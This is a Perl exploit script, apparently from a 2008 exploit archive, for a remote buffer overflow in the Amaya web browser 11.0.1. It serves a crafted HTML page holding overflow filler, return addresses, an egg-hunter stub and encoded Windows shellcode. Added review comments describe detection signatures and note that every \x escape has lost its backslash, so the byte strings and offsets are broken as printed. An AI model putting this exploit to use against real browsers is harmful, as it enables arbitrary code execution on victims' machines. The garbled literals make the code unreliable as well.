
# Title : Amaya Web Browser <= 11.0.1 Remote Buffer Overflow Exploit (vista)
# Published : 2008-12-28
# Author : SkD


#!/usr/bin/perl
#
# Amaya Web Browser <= 11.0.1 Remote Buffer Overflow Exploit
# Found/Exploit by SkD (skdrat@hotmail.com)
# 		       (skd@abysssec.com  )
# -----------------------------------------------
# This is advanced buffer overflow exploitation using
# my new method called shellhunting :)
#
# Get more information about this at http://abysssec.com
#
# "Remember: when connecting to the web server, the link needs to end with .html, e.g. http://127.0.0.1/s.html ("s" can be anything)"
#
# Exploit works only on a fully patched Vista SP1, but you
# may need to click 'Refresh' to make the shellcode exec
# sometimes.
#
# Note: Author has no responsibility over the damage you do with this!


use strict;
use warnings;
use IO::Socket;

# -- Review notes (defender's view) -----------------------------------------
# These assignments build the pieces that the server loop below concatenates
# into one HTML page: filler, the author's address/stub pieces placed inside
# a <td nowrap="..."> attribute, and the remaining pieces plus the encoded
# payload inside an unclosed "<title" element.  Several KB of repeated filler
# characters inside an attribute value and a stray "<title" after </html> are
# abnormal for legitimate HTML and are usable as detection signatures at a
# proxy or IDS.  The header claims only Amaya <= 11.0.1 on Vista SP1 is
# affected; whether later releases fix the issue is not stated on this page.
#
# NOTE(review): every "\x" escape in this listing has lost its backslash
# during extraction ("xeb" instead of "\xeb", "n" instead of "\n"), so each
# literal below is plain ASCII text, not the byte string the author built.
# Lengths and the offset arithmetic derived from them (see $overflow4len) no
# longer correspond to the author's intended layout.  The literals are kept
# as they appear on the page.
my $html;                   # unused: declared but never assigned or read
my $port_listen = 80; # change this to your desired port!
my $listenip = "127.0.0.1"; # change this to your desired IP!

# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
# "Size=343" refers to the original encoded payload; length($shellcode) as
# printed here is larger because the backslashes are missing.
my $shellcode =
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44".
"x42x30x42x50x42x30x4bx48x45x54x4ex43x4bx38x4ex47".
"x45x50x4ax57x41x30x4fx4ex4bx58x4fx54x4ax41x4bx38".
"x4fx45x42x42x41x50x4bx4ex49x44x4bx38x46x33x4bx48".
"x41x50x50x4ex41x53x42x4cx49x59x4ex4ax46x58x42x4c".
"x46x57x47x30x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e".
"x46x4fx4bx53x46x55x46x32x46x50x45x47x45x4ex4bx58".
"x4fx45x46x52x41x50x4bx4ex48x56x4bx58x4ex50x4bx44".
"x4bx48x4fx55x4ex41x41x30x4bx4ex4bx58x4ex41x4bx38".
"x41x50x4bx4ex49x48x4ex45x46x32x46x50x43x4cx41x33".
"x42x4cx46x46x4bx38x42x44x42x53x45x38x42x4cx4ax47".
"x4ex30x4bx48x42x44x4ex50x4bx58x42x37x4ex51x4dx4a".
"x4bx48x4ax36x4ax30x4bx4ex49x50x4bx38x42x58x42x4b".
"x42x50x42x50x42x50x4bx38x4ax36x4ex43x4fx45x41x53".
"x48x4fx42x46x48x35x49x38x4ax4fx43x48x42x4cx4bx57".
"x42x45x4ax36x42x4fx4cx38x46x30x4fx35x4ax46x4ax39".
"x50x4fx4cx38x50x50x47x55x4fx4fx47x4ex43x46x41x46".
"x4ex46x43x36x42x50x5a";

# The author's "shellhunter" stub (claimed to be 98% alphanumeric); this is
# the second variant, which the author says makes the exploit more reliable.
# The trailing comments are the author's own annotations of the pieces.
my $shellhunter = ("x58x58x40x40").("x47" x 4).("x42" x 6).     # author: "inc edi"
		  ("x42" x 24).("x42" x 24).("x39x07x75x8bx71x71").
                  ("x47x47x47x47x57xFFx65x78x77x76");
my $overflow = "x42" x 158;     # filler placed before the jump/address pieces
my $overflow2 = "x42" x 4;      # unused: never referenced by the server loop
my $overflow3 = "x43" x 430;    # filler between the heap address and the stub
# Filler length is derived from length($shellhunter); with the escapes lost
# in extraction that length differs from the author's, so this value no
# longer reproduces the original layout.
my $overflow4len = 977 - ((length($shellhunter) - 7));   #very important calculation
my $overflow4 = "x44" x $overflow4len;
my $sled = "x42" x 12;
my $sled2 = "x41" x 24;
my $eip2 = "x37x55x03x10";  #10035537 call ecx, this won't be used (author's note; variable is unused)
my $eip1 = "x30x4fx01x10"; #10014F30 call esi, this will be used (author's note)
my $heapaddr = "x50x0ex08x10";    #valid char for buffer, heap address (author's note)
# "look out" values: the author's markers that the stub above searches for;
# the four variants differ only in trailing padding.
my $lookout = "x37x65x41x45" x 40;      # 45446537    look out values <-
my $lookout2 = "x37x65x41x45x41" x 4;      # 45446537                <-
my $lookout3 = "x37x65x41x45x41x41" x 4;      # 45446537            <-
my $lookout4 = "x37x65x41x45x41x41x41" x 4;      # 45446537        <-
my $additionaddr = "x35x65x41x45";    #used for an addition in the shellhunter  (+2)  (author's note)
my $nopsled = "x90x90x90x90x90x90";
my $jmp = "x75x0c";
# The trailing "n" is the remains of a "\n" escape; as printed, no newline.
print "[x] Amaya Web Browser <= 11.0.1 Remote Buffer Overflow Exploitn";
print "[x] Found/Exploit by SkD (skdrat@ hotmail.com)(skd@ abysssec.com)n";

# Serve the assembled page to every client that connects.  The outer loop
# re-creates the listening socket whenever accept() stops returning clients;
# the inner loop answers one connection at a time.  The "n"/"rn" at the
# ends of the strings are the remains of "\n"/"\r\n" escapes whose
# backslashes were lost in extraction, so the response as printed contains
# no real line breaks; the strings are reproduced exactly as they stand.
while (1) {
    my $sock = IO::Socket::INET->new(
        Listen    => 1,
        LocalAddr => $listenip,
        LocalPort => $port_listen,
        Proto     => 'tcp',
    );
    die unless $sock;    # no message: dies with the default "Died at ..." text
    print "[x] Waiting for clients on port " . $port_listen . "..n";

    while (my $client = $sock->accept()) {
        print "[x] Got a client!n";

        # One request line is read and discarded -- presumably so that the
        # response is not written before the client has sent anything.
        my $request_line = <$client>;

        print {$client} "HTTP/1.0 200 OKnContent-Type: text/htmlnn";
        print "[x] Serving Exploit HTML page :)n";

        # Page layout: filler and the author's address/stub pieces inside a
        # <td nowrap="..."> attribute, then the marker values, sled and
        # encoded payload inside an unclosed "<title" element after </html>.
        my @page = (
            "<html>n",
            "<head><title>Welcome to SkD's world!</title></head>n",
            "<body>n",
            "<td nowrap=x22nowrap",
            $overflow, $jmp, $eip1, $additionaddr, $heapaddr, $overflow3,
            $shellhunter, $sled, $overflow4,
            "x22>n",
            "</td>n",
            "</body>n",
            "</html><title",
            $lookout4, $lookout3, $lookout2, $lookout, $sled2, $nopsled,
            $shellcode,
            "></title>rn",
        );
        print {$client} join('', @page);

        sleep(0.5);    # builtin sleep takes whole seconds: 0.5 truncates to 0
        close($client);    # return value unchecked, as in the original
        print "[x] Done!n";
    }
}
